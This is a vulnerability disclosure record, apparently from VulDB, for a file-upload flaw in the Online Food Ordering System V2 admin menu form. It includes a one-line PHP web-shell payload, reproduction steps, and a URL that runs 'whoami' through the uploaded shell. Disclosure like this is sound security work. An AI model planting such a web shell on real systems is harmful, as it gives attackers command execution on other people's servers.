| 标题 | Online Food Ordering System V2 - File Upload to OS Command Injection |
|---|
| 描述 | # Exploit Title: Online Food Ordering System V2 - File Upload to OS Command Injection
# Exploit Author: Kshitij Rewandkar
# Vendor Name: oretnom23
# Vendor Homepage: https://www.sourcecodester.com/php/16022/online-food-ordering-system-v2-using-php8-and-mysql-free-source-code.html
# Software Link: https://www.sourcecodester.com/php/16022/online-food-ordering-system-v2-using-php8-and-mysql-free-source-code.html
# Version: v2.0
# Tested on: Windows 11, Apache
Description:-
A File Upload Vulnerability which has been escalated to OS Command Injection in Online Food Ordering System V2 while uploading a .php file in "Menu Form" page.
`
Payload used:-
<?php system($_GET['c']); ?>
`
Parameter":-
Menu Form > Image: <?php system($_GET['c']); ?>
`
Steps to reproduce:-
1. Here we go to : http://localhost/fos/admin/index.php?page=menu
2. Now in those Parameters "Image" here we upload a php file
3. In that we put our payload "<?php system($_GET['c']); ?>" and we name it as 1.php and upload it
4. As we open in another tab we need to put our endpoint "?c=" and we can see our OS Command Injection Attack
http://localhost/fos/assets/img/1673548800_PHP_exif_system.php?c=whoami |
|---|
| 用户 | DisguisedRoot (UID 33702) |
|---|
| 提交 | 2023-01-12 19時58分 (3 年前) |
|---|
| 管理 | 2023-01-12 22時09分 (2 hours later) |
|---|
| 状态 | 已接受 |
|---|
| VulDB条目 | 218185 [SourceCodester Online Food Ordering System 2.0 Menu Form index.php?page=menu Image 权限提升] |
|---|
| 积分 | 17 |
|---|